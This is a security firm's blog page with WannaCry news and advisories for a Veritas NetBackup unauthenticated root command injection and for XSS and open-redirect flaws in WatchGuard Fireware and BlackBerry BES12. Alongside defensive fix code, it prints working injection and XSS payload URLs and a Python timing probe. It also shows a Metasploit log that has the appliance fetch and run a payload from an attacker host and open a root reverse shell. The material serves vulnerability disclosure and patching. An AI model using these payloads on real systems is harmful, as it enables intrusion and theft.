Malwaretech stems Wcry for now

The Internet’s Unsung Hero

MalwareTech registered the domain the malware checks before spreading (believed to be a sandbox-detection check). The registration acted as a kill switch and essentially shut down any further spread overnight, but expect a new version without this check to be released soon.

Update XP & 2003

Microsoft have issued an unusual out-of-band update that makes the MS17-010 fix available for otherwise unsupported operating systems, including Windows XP, Windows 8 and Windows Server 2003. Get patching immediately, before a new version is released.

Sources

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

https://www.forbes.com/sites/thomasbrewster/2017/05/13/wannacry-ransomware-outbreak-stopped-by-researcher/#7535e93474fc


Posted in Advisories, News, Uncategorized

Weaponised Wanna Decryptor Worm

Patch MS17-010 NOW!!!

The cryptomalware that has affected Telefonica and other organisations in Spain, and the NHS in the UK, has been confirmed as a fully weaponised version of the crypto malware Wanna Decryptor (aka "WannaCry" and "Wcry").
As far as we currently understand, this new strain actively exploits the SMB vulnerability patched by the MS17-010 update Microsoft released in March, allowing it to spread between unpatched hosts without any user interaction.

This is novel behaviour for cryptomalware and we expect this to have widespread effects. We strongly advise you to ensure all internal systems (especially critical domain controllers, fileservers and exchange servers) have the MS17-010 patch applied as soon as possible.

Additionally, ensure TCP ports 139 and 445 (SMB) and 3389 (RDP) are not exposed to the Internet.

Because of the way this malware propagates, ensure that backups are held offline: backups that are offline cannot be encrypted if your network is hit.

Further updates will be released as we investigate the nature of this attack, but do ensure you follow the major news feeds on Twitter, LinkedIn etc.

Sources:
https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/
https://www.theregister.co.uk/2017/05/12/spain_ransomware_outbreak/
https://isc.sans.edu/diary/22412
https://intel.malwaretech.com/botnet/wcrypt

Posted in Advisories, News

Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Severity : High
Advisory Name : Veritas NetBackup Appliance Unauthenticated Remote Command Execution
Discovery Date : 17/05/2016
Release Date : 04/10/2016
Application : NetBackup Appliance versions 2.6.0.1 through 2.7.3, and the v3.0 series
Platform : Linux
CVE : CVE-2016-7399
CVSSv3 Base Score : 10.0
CVSSv3 Vector : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
Discovered by : Matthew Hall
Vendor Status : Emergency Engineering Binaries (EEBs) are available to fix this vulnerability on the following Encap releases of the NetBackup appliances: version 2.6.0.4, 2.6.1.2 and 2.7.3.
See https://www.veritas.com/support/en_US/article.000116055 for more information.
Veritas are aware that the issue is present in the current version of the product. A fix is scheduled for the NetBackup Appliances v3.0 release.
References : http://www.sec-1.com/blog
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7399
https://www.veritas.com/content/support/en_US/security/VTS16-002.html
https://www.veritas.com/support/en_US/article.000116055
https://nvd.nist.gov/vuln/detail/CVE-2016-7399

Vulnerability Summary

Unauthenticated Remote Command Execution

Description:
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.” (Source: OWASP).

“The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.” (Source: CWE-78)

Exploit

One instance was identified where an unauthenticated attacker could gain remote command execution on the underlying Red Hat Linux operating system through the NetBackup Web Management Interface at the following URL:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=<argument>

The GET parameter "hostName" is controlled by the user and is ultimately used as an argument in a system call to a Perl script located at /opt/NBUAppliance/scripts/license.pl

It is possible to use backticks, semicolons, ampersands, pipe characters and the bash subshell construct "$()" to execute commands on the underlying operating system as the user that calls the license.pl script (root in this case).
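The following Python example is added here to show the pattern behind the advisory and its fix; it is not the appliance's code. Assumptions: "echo" stands in for /opt/NBUAppliance/scripts/license.pl so the example runs anywhere, and the real script's argument handling is not reproduced. The vulnerable function builds a command line that a shell parses, exactly the condition CWE-78 describes; the hardened one validates the value as a host name and passes it as a discrete argv element so no shell ever sees it.

```python
import re
import subprocess

# Assumption: "echo" stands in for /opt/NBUAppliance/scripts/license.pl so the
# example runs on any Linux host; the real script is not reproduced here.
LICENSE_SCRIPT = "echo"

# RFC 1123 host name: labels of letters, digits and hyphens joined by dots.
# Nothing a shell treats specially ($ ( ) ` ; & | space) can match this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_license_vulnerable(host_name: str) -> str:
    """CWE-78 as in the advisory: the request parameter is pasted into a
    command line that a shell then parses, so $(...), backticks, ';', '&'
    and '|' inside host_name are interpreted as shell syntax."""
    command_line = f"{LICENSE_SCRIPT} {host_name}"
    result = subprocess.run(command_line, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def run_license_argv_only(host_name: str) -> str:
    """argv passing without validation: the metacharacters reach the script
    as literal text and are not executed, but a value such as '--help' could
    still be read by the script as an option, so validation is also needed."""
    result = subprocess.run([LICENSE_SCRIPT, host_name], shell=False,
                            capture_output=True, text=True)
    return result.stdout.strip()


def run_license_hardened(host_name: str) -> str:
    """Two independent fixes: reject anything that is not a host name, and
    pass the value as its own argv element so no shell is involved."""
    if not HOSTNAME_RE.match(host_name):
        raise ValueError(f"hostName is not a valid host name: {host_name!r}")
    return run_license_argv_only(host_name)


if __name__ == "__main__":
    payload = "$(echo INJECTED)"   # same shape as the advisory's $(sleep 6)
    print("vulnerable:", run_license_vulnerable(payload))   # INJECTED
    print("argv only :", run_license_argv_only(payload))    # $(echo INJECTED)
    try:
        run_license_hardened(payload)
    except ValueError as err:
        print("hardened  :", err)
    print("hardened  :", run_license_hardened("nbu-appliance.example.com"))
```

Note that the argv-only variant already stops the injection; the host-name check is there so that the script cannot be handed option-like or otherwise malformed values either, which is the defence in depth a web-facing management interface should have.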

As this vulnerability allows an unauthenticated attacker to gain root level privileges on the affected device, the effects could include:

  • Recovering sensitive data from system backups
  • Stealing cached credentials/password hashes from virtual machines backed up to the device
  • Enrolling the system into a botnet
  • Installation of a rootkit/backdoor for remote persistence into an internal network

Example Payload/POC

The RCE is “blind” – that is, the response from the server does not include the results of executed commands; as such, the following proof of concept can be used.

Calling the following URL will result in the server response being delayed by six seconds:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(sleep%206)

Testing for command execution can also be performed using Out of Band techniques such as “ping” or “nslookup”, e.g:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(ping%20<attackers_IP_address>%20-c2)

Performing a network capture on the attacker's host should show the appliance sending two ICMP echo requests.
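The timing check above can be made more robust than a single six-second request. The added Python probe below is not part of the advisory or the Metasploit module: it builds the same getLicense URL, sends two sleeps of different lengths and only reports injection when the second response is slower than the first by about the difference between them, so one slow response caused by a busy appliance or network jitter is not mistaken for code execution. Assumptions: the appliance address is filled into the base URL by the operator, and its web interface uses a self-signed certificate (hence certificate verification is disabled for lab use). The fetch function is a parameter so the logic can be exercised offline.

```python
import ssl
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# Assumption: the endpoint from the advisory with the appliance address
# filled in by the operator.
DEFAULT_BASE = "https://<appliance_ip_address>/appliancews/getLicense"


def probe_url(base_url: str, host_name: str) -> str:
    """Build .../getLicense?hostName=<value>, percent-encoding the payload
    (space -> %20, as in the advisory's URLs)."""
    query = urllib.parse.urlencode({"hostName": host_name},
                                   quote_via=urllib.parse.quote)
    return f"{base_url}?{query}"


def http_fetch(url: str, timeout: float = 60.0) -> None:
    """Real transport: issue the GET and discard the body; the injection is
    blind, so only the elapsed time carries information."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE   # assumption: self-signed appliance cert
    try:
        with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass                          # a 4xx/5xx still took the time we measure


def timed_fetch(fetch: Callable[[str], None], url: str) -> float:
    start = time.monotonic()
    fetch(url)
    return time.monotonic() - start


def time_based_check(base_url: str = DEFAULT_BASE,
                     fetch: Callable[[str], None] = http_fetch,
                     delay: float = 6.0, samples: int = 3) -> bool:
    """Return True when the server's response time tracks an injected sleep.

    baseline : slowest of `samples` requests with a harmless host name
    short    : request carrying $(sleep delay)
    long_    : request carrying $(sleep 2*delay)
    Injection is reported only if `short` exceeds the baseline by roughly
    `delay` AND `long_` exceeds `short` by roughly `delay` again.
    """
    baseline = max(timed_fetch(fetch, probe_url(base_url, "localhost"))
                   for _ in range(samples))
    short = timed_fetch(fetch, probe_url(base_url, f"$(sleep {delay:g})"))
    long_ = timed_fetch(fetch, probe_url(base_url, f"$(sleep {2 * delay:g})"))
    tolerance = 0.25 * delay
    return (short >= baseline + delay - tolerance
            and abs((long_ - short) - delay) <= tolerance)


if __name__ == "__main__":
    target = "https://192.0.2.10/appliancews/getLicense"   # documentation address
    print(probe_url(target, "$(sleep 6)"))
    print("injectable:", time_based_check(target))
```

Run it against an appliance you are authorised to test; with the default six-second delay a positive result takes around twenty seconds, which is cheap compared with a false positive that sends you chasing a non-existent bug.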

Exploit Example

A fully working exploit module has been written for this issue for use within the Metasploit Framework. An example of its use is shown below.

Until its incorporation into the Metasploit Framework, the module is available on GitHub.

msf > use exploit/linux/http/veritas_netbackup_exec
msf exploit(veritas_netbackup_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(veritas_netbackup_exec) > set RHOST 192.168.114.10
RHOST => 192.168.114.10
msf exploit(veritas_netbackup_exec) > set RPORT 443
RPORT => 443
msf exploit(veritas_netbackup_exec) > set SSL true
SSL => true
msf exploit(veritas_netbackup_exec) > info

Name: Veritas NetBackup Appliance Web Console OS Command Injection
Module: exploit/linux/http/veritas_netbackup_exec
Platform: Linux, Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-05-17

Provided by:
Matthew Hall

Available targets:
Id Name
-- ----
0 CMD
1 Linux Payload

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOWNFILE no Filename to download, (default: random)
DOWNHOST no An alternative host to request the payload from
HTTP_DELAY 60 yes Time that the HTTP Server will wait for the ELF payload request
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.114.10 yes The target address
RPORT 443 yes The target port
SRVHOST 192.168.114.254 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:

Description:
The Veritas NetBackup Appliance is vulnerable to an unauthenticated
OS Command Injection Vulnerability via arguments passed to backend
perl scripts when performing license verification. Since it is a
blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. This module was
tested against a Veritas NetBackup Appliance Version 2.7.2. A ping
command against a controlled system could be used for testing
purposes. The exploit uses the wget client from the device to
convert the command injection into an arbitrary payload execution.

msf exploit(veritas_netbackup_exec) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.114.254:4444
msf exploit(veritas_netbackup_exec) > [*] 192.168.114.10:443 - Starting up our web service on http://192.168.114.254:8080/lKYbcvGEQ ...
[*] Using URL: http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Asking the Veritas device to download http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /usr/bin/wget%20http://192.168.114.254:8080/lKYbcvGEQ%20-O%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Sending the payload to the server...
[*] 192.168.114.10:443 - Waiting for the victim to request the ELF payload...
[*] 192.168.114.10:443 - Asking the Veritas device to chmod lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command chmod%20777%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Asking the Veritas device to execute lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /tmp/hbtoqwqc
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.114.10
[*] Meterpreter session 1 opened (192.168.114.254:4444 -> 192.168.114.10:33662) at 2016-05-17 12:36:28 +0100
[+] Deleted /tmp/hbtoqwqc

msf exploit(veritas_netbackup_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : .site
OS : Linux .site 2.6.32-504.30.3.el6.x86_64 #1 SMP Thu Jul 9 15:20:47 EDT 2015 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter >

meterpreter > ls
Listing: /opt/SYMCnbappws
=========================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40700/rwx------ 4096 dir 2016-04-27 12:57:23 +0100 Security
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:14 +0100 XSD
100664/rw-rw-r-- 7548948 fil 2016-01-20 12:48:40 +0000 appliancews.war
40775/rwxrwxr-x 4096 dir 2016-04-27 13:30:51 +0100 bin
40775/rwxrwxr-x 4096 dir 2016-04-30 15:40:17 +0100 config
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:15 +0100 docs
40775/rwxrwxr-x 4096 dir 2016-04-27 12:57:25 +0100 eat
40755/rwxr-xr-x 4096 dir 2016-04-27 12:29:49 +0100 jre
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 lib
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 resources
100755/rwxr-xr-x 12223204 fil 2016-01-20 13:06:50 +0000 server-2.7.2.war
100664/rw-rw-r-- 9722862 fil 2016-01-20 12:48:40 +0000 symhelp.war
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:22 +0100 webserver

meterpreter > pwd
/opt/SYMCnbappws

Vendor Response

Veritas have released Emergency Engineering Binaries (EEBs) that fix this vulnerability for appliance versions 2.6.0.4, 2.6.1.2 and 2.7.3. Veritas are aware that the issue is present in the current version of the product; a fix has been scheduled for the NetBackup Appliances v3.0 release.
Sec-1 would like to thank Veritas for their very professional and prompt responses in dealing with this matter.

Posted in Advisories, Tools

Hunting HTML 5 postMessage Vulnerabilities

Download Paper: Hunting postMessage Vulnerabilities

Download Sample Code: sample code

Sec-1 Ltd partnered with AppCheck.com to undertake a research project investigating the security challenges posed by next generation web applications. The project included an investigation of Cross-Origin communication mechanisms provided via HTML5 including postMessage and CORS.

One of the key findings from the research shows that vulnerabilities introduced through an insecure postMessage implementation are frequently missed by security scanners and consultants performing manual review.

Summary of findings:

  • Cross-Origin communication via postMessage introduces a tainted data source that is difficult to identify using currently available tools.
  • Cross-Site Scripting and Information disclosure vulnerabilities as a result of insecure postMessage code were identified across many Fortune 500 companies and websites listed within the Alexa Top 10. Three case study reports (Adobe, Apple iCloud and YouTube) are included within this paper.
  • Discussion with members of the development and information security communities show that the vulnerabilities demonstrated within this document are poorly understood. In many cases postMessage events were not readily identified as a potential source for malicious tainted data.
  • In many cases vulnerable code is introduced via third party libraries and therefore may undermine the security of an otherwise secure application.

This paper aims to provide an overview of the most common postMessage security flaws and introduce a methodology and toolset for quickly identifying vulnerabilities during the course of a Black-box security assessment.

Proof of Concept Example: iCloud.com

The following video demonstrates a postMessage flaw identified within the Apple iCloud service. A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Proof of Concept: YouTube.com

The following video demonstrates a postMessage flaw identified within YouTube.com. A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Posted in News, Tools, White Papers

Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11
Discovery Date : 27/04/2016
Release Date : 11/07/2016
Application : WatchGuard Fireware version 11.11 and earlier
Platform : Windows
CVE : CVE-2016-6154
Discovered by : Ryan Ward
Vendor Status : Resolved in v11.11.1 Fireware Update available from: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/index.html#Fireware/en-US/EN_Release_Notes_Fireware.html
Website : http://www.sec-1.com/blog
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6154
http://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/Fireware_Release-Notes_v11_11_1.pdf

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS) and Open Redirection

Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Open redirection vulnerabilities occur when an application incorporates user controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users.

Exploit

A single parameter on the SSL-VPN authentication applet of WatchGuard firewalls running Fireware earlier than v11.11.1 was found to be vulnerable to both Reflected Cross-Site Scripting (XSS) and Open Redirection. This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user (virtual defacement)

Example Payload/POC
The vulnerability can be reproduced by browsing to "success.html?redirect=javascript:alert(document.domain)" on the SSL-VPN port (4100 by default) of any affected WatchGuard firewall:

https://Firewall_IP:4100/success.html?redirect=javascript:alert(“Sec-1”)


The same parameter was also found to be vulnerable to an open redirect: https://Firewall_IP:4100/success.html?redirect=http://www.sec-1.com would redirect the user's browser to the Sec-1 homepage.
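Both issues come from the same root cause, a redirect target taken verbatim from the request, and both are closed by one validation step. The following Python function is an added example of that validation; it is not WatchGuard's fix and makes no claim about how Fireware 11.11.1 implements it. It accepts only a local absolute path, or optionally an https URL whose host is on an explicit allow-list (the allow-list and the host names used are illustrative), and falls back to a safe default for everything else, including the javascript: and external-URL payloads from this advisory and the protocol-relative and backslash variants that browsers normalise into external redirects.

```python
import urllib.parse


def safe_redirect_target(value: str, default: str = "/",
                         allowed_hosts=frozenset()) -> str:
    """Return a redirect target that stays on this site, or `default`.

    Accepted:  "/path?query"   (one leading slash, nothing scheme-like)
               "https://<host>/..." only when <host> is in allowed_hosts
    Rejected:  any other scheme (javascript:, data:, http:), "//host",
               "/\\host", values containing control characters or
               whitespace, and userinfo tricks such as https://good@evil/.
    """
    if not value:
        return default
    candidate = value.strip()
    # Browsers strip leading control characters and whitespace before
    # interpreting a URL, so "  java\tscript:" must not survive to the scheme check.
    if any(ord(ch) <= 0x20 for ch in candidate):
        return default
    parts = urllib.parse.urlsplit(candidate)
    if parts.scheme:
        # Absolute URL: only https to an explicitly allowed host. .hostname is
        # lower-cased and excludes userinfo, so https://good@evil/ yields "evil".
        if parts.scheme != "https" or parts.hostname not in allowed_hosts:
            return default
        return candidate
    # Relative target: exactly one leading "/", not "//host" or "/\host",
    # and no netloc parsed out of it.
    if (not candidate.startswith("/") or candidate[1:2] in ("/", "\\")
            or parts.netloc or "\\" in candidate):
        return default
    return candidate


if __name__ == "__main__":
    # Constructed inputs, including the two payloads from this advisory.
    for sample in ('javascript:alert("Sec-1")', "http://www.sec-1.com",
                   "//www.sec-1.com/", "/\\www.sec-1.com",
                   "/sslvpn.html?page=1"):
        print(repr(sample), "->", safe_redirect_target(sample))
```

Server-side code should apply this before emitting a Location header; if the redirect is performed by script in success.html, the same check belongs in that script, and the sanitised value should still never be assigned to location from a javascript: scheme.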

Vendor Response

As of Fireware 11.11.1 this vulnerability has been reported as being fixed by WatchGuard. Sec-1 would like to thank WatchGuard for their prompt and professional response.

Posted in Advisories

Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4
Discovery Date : 23/02/2016
Release Date : 12/04/2016
Application : BES12 version 12.4 and earlier
Platform : Windows
CVE : CVE-2016-1917
CVE-2016-1918
Discovered by : Nicodemo Gawronski
Vendor Status : Resolved in April 2016 Blackberry Update available from http://web.blackberry.com/support/business/bes-support/bes-support-downloads.html
Website : http://www.sec-1.com/blog
http://support.blackberry.com/kb/articleDetail?articleNumber=000038118
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1918

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS)

Two instances of Reflected Cross-Site Scripting were discovered in the affected software.
Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Exploit

Two parameters, on "admin/settings/redirect.do" and "admin/user/userDetails.do" respectively, of the BES12 web server were found to be vulnerable to Reflected Cross-Site Scripting (XSS).
This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user

Example Payload/POC

Steps to reproduce the vulnerability:

  1. Log in to the BES12 Server.
  2. Access the following URLs:

https://BES12_Server_IP/admin/settings/redirect.do?settingUrl=%22-alert%28document.domain%29-%22

Reflected XSS in "/admin/settings/redirect.do" (settingUrl parameter)

https://BES12_Server_IP/admin/user/userDetails.do?userId=3&backLocation=usergrid");alert(1);//&suppressLoginWizard=true&gridHandleId=50896ee8-f282-4713-b54d-33f7725099fb

Reflected XSS in "/admin/user/userDetails.do" (backLocation parameter)

These are simplistic payloads that merely display a pop-up message showing that the page is vulnerable; a more advanced payload could easily be generated to perform the actions discussed above.
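The shape of both payloads (a closing double quote, JavaScript, then a comment or a reopening quote) indicates that the parameters are written into a JavaScript string literal inside a script block, a context in which plain HTML escaping is the wrong encoder. The Python example below is added here and is not BlackBerry's code; the page fragments it produces are assumed for illustration. It shows the unsafe interpolation beside a context-correct encoder that turns any value into a JavaScript string literal that cannot close the string, end the statement or close the surrounding script element.

```python
import json


def js_string_literal(value: str) -> str:
    """Encode `value` as a double-quoted JavaScript string literal that is
    safe to embed inside a <script> block.

    json.dumps escapes quotes, backslashes and control characters and, with
    the default ensure_ascii=True, writes non-ASCII (including U+2028/2029
    line terminators) as \\uXXXX. '<', '>' and '&' are then escaped as well
    so the literal can never spell "</script>" or an HTML entity.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def redirect_script_vulnerable(setting_url: str) -> str:
    """Assumed page fragment: raw interpolation into a JS string. The
    advisory's payload "-alert(document.domain)-" closes the string and
    runs code."""
    return f'<script>window.location = "{setting_url}";</script>'


def redirect_script_fixed(setting_url: str) -> str:
    """Same fragment with the value encoded for the JS-string context. The
    redirect target itself still needs validating (scheme, host) before use;
    encoding only guarantees it stays a string."""
    return f"<script>window.location = {js_string_literal(setting_url)};</script>"


if __name__ == "__main__":
    # Constructed inputs: the two payloads from this advisory plus a
    # script-element breakout.
    for payload in ('"-alert(document.domain)-"', 'usergrid");alert(1);//',
                    "</script><img src=x onerror=alert(1)>"):
        print(redirect_script_vulnerable(payload))
        print(redirect_script_fixed(payload))
```

The same encoder applies to the backLocation parameter in userDetails.do; a templating engine that knows the output context (a JS-string escaper, not an HTML escaper) is the maintainable way to get this right across an application.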

Vendor Response

The vendor has patched the XSS issues in the April 2016 Software Update. Sec-1 would like to thank Blackberry for their prompt and professional response.

Posted in Advisories